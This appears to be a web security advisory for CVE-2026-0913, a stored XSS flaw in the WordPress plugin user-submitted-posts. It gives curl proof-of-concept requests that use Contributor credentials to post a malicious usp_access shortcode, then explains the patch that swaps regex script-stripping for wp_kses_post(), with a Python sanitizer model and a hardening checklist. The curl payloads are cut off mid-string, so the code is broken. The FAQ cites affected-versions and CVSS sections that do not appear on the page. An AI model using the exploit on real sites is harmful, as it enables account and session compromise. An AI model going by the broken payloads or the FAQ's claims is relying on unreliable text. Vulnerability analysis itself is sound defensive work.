SECURITY ADVISORY / 01

CVE-2026-0913 Exploit & Vulnerability Analysis

Complete CVE-2026-0913 security advisory with proof of concept (PoC), exploit details, and patch analysis.

Patch diff identifier: cve_patchdiff:user-submitted-posts (plugin: user-submitted-posts; NVD entry listed under References)

The Exploit

An authenticated attacker with Contributor-level access can inject a stored XSS payload into the usp_access shortcode deny/content attributes.

curl -i -X POST 'https://TARGET/wp-json/wp/v2/posts' \
  -H 'Authorization: Basic BASE64_CONTRIBUTOR_CREDS' \
  -H 'Content-Type: application/json' \
  -d '{
    "title": "usp_access XSS",
    "content": "[usp_access deny=\"<img src=x
    "status": "publish"
  }'

curl -i 'https://TARGET/?p=123' | grep -o '<img src=x

The first request stores the malicious usp_access shortcode in post content. The second request loads the published page and the response contains the injected <img> tag, meaning any victim viewing that page would execute the injected script.

What the Patch Did

Before:

$deny = preg_replace('#<script(.*)>(.*)</script>#is', '', $deny);
$content = preg_replace('#<script(.*)>(.*)</script>#is', '', $content);

After:

$deny = wp_kses_post($deny);
$content = wp_kses_post($content);

The patch replaced an ad-hoc regex-based filter with wp_kses_post(), a WordPress sanitization API that whitelists allowed HTML tags and strips unsafe markup and attributes.

Root Cause

This was CWE-79: Stored Cross-Site Scripting. User-controlled shortcode attributes deny and content were accepted by usp_access and only had <script> tags stripped by a regex. That sanitization was insufficient, so attacker-supplied HTML and event handlers flowed from the shortcode attribute into page output unchecked.

Why It Works

The load-bearing fix is wp_kses_post(). Without it, the plugin still allows HTML like <img src=x> or other non-<script> payloads through because the regex only targets literal <script> tags. The earlier code did not validate the actual shortcode content as HTML, so any attribute-based or tag-based XSS vector bypassed the filter. The other changes around htmlspecialchars() and brace replacement are defensive hardening for related rendering paths, but the critical security control is the HTML whitelist sanitization provided by wp_kses_post().
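To make that gap concrete, the following is an added Python model (not the plugin's code and not WordPress's) that transcribes the pre-patch regex and contrasts it with a small tag/attribute allowlist standing in for what wp_kses_post() does; the allowlist table, the function names and the sample payload strings are constructed for this example.

```python
import html
import re
from html.parser import HTMLParser

# Pre-patch filter, transcribed from the advisory's PHP:
#   preg_replace('#<script(.*)>(.*)</script>#is', '', $value)
SCRIPT_RE = re.compile(r"<script(.*)>(.*)</script>", re.IGNORECASE | re.DOTALL)

def legacy_filter(value: str) -> str:
    """Pre-patch behaviour: only literal <script>...</script> blocks are removed."""
    return SCRIPT_RE.sub("", value)

# Simplified, constructed stand-in for wp_kses_post(): an allowlist of tags and
# attributes. Unknown tags, every on* handler and javascript: URLs are dropped.
ALLOWED = {"a": {"href", "title"}, "img": {"src", "alt"}, "b": set(), "i": set(), "p": set()}

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__()
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # unlisted tag: the tag is dropped, its text content is kept
        kept = []
        for name, val in attrs:
            val = val or ""
            if name not in ALLOWED[tag] or val.strip().lower().startswith("javascript:"):
                continue
            kept.append(f' {name}="{html.escape(val, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <img .../>: emit the start tag only

    def handle_endtag(self, tag):
        if tag in ALLOWED:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))  # re-escape text nodes

def allowlist_filter(value: str) -> str:
    """Post-patch model: rebuild the markup from the allowlist only."""
    p = AllowlistSanitizer()
    p.feed(value)
    p.close()
    return "".join(p.out)
```

Running both filters over a constructed deny attribute such as `<img src=x onerror="x()">hidden` shows the legacy regex returning it untouched while the allowlist keeps only `<img src="x">hidden`.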

Hardening Checklist

  • Use wp_kses_post() or wp_kses() for any user-supplied HTML that will be rendered in post content or shortcode output.
  • For shortcode attributes that should not contain HTML, use sanitize_text_field() and esc_attr() instead of attempting regex stripping.
  • Never rely on regex to remove <script> tags; use WordPress sanitization APIs.
  • Validate shortcode input with shortcode_atts() and explicit sanitizers for each expected field.
  • Escape shortcode output at render time with esc_html() or esc_attr() whenever user input is meant to be rendered as text rather than markup.

References

  • https://nvd.nist.gov/vuln/detail/CVE-2026-0913

Frequently asked questions about CVE-2026-0913

What is CVE-2026-0913?

CVE-2026-0913 is a security vulnerability. This security advisory provides detailed technical analysis of the vulnerability, exploit methodology, affected versions, and complete remediation guidance.

Is there a PoC (proof of concept) for CVE-2026-0913?

Yes. This writeup includes proof-of-concept details and a technical exploit breakdown for CVE-2026-0913. Review the analysis sections above for the PoC walkthrough and code examples.

How does CVE-2026-0913 get exploited?

The technical analysis section explains the vulnerability mechanics, attack vectors, and exploitation methodology. PatchLeaks publishes this information for defensive and educational purposes.

What products and versions are affected by CVE-2026-0913?

For CVE-2026-0913, check the affected-versions section of this advisory for specific version ranges, vulnerable configurations, and compatibility information.

How do I fix or patch CVE-2026-0913?

The patch analysis section provides guidance on updating to patched versions, applying workarounds, and implementing compensating controls.

What is the CVSS score for CVE-2026-0913?

The severity rating and CVSS scoring for CVE-2026-0913 are documented in the vulnerability details section. Refer to the NVD entry for the current authoritative score.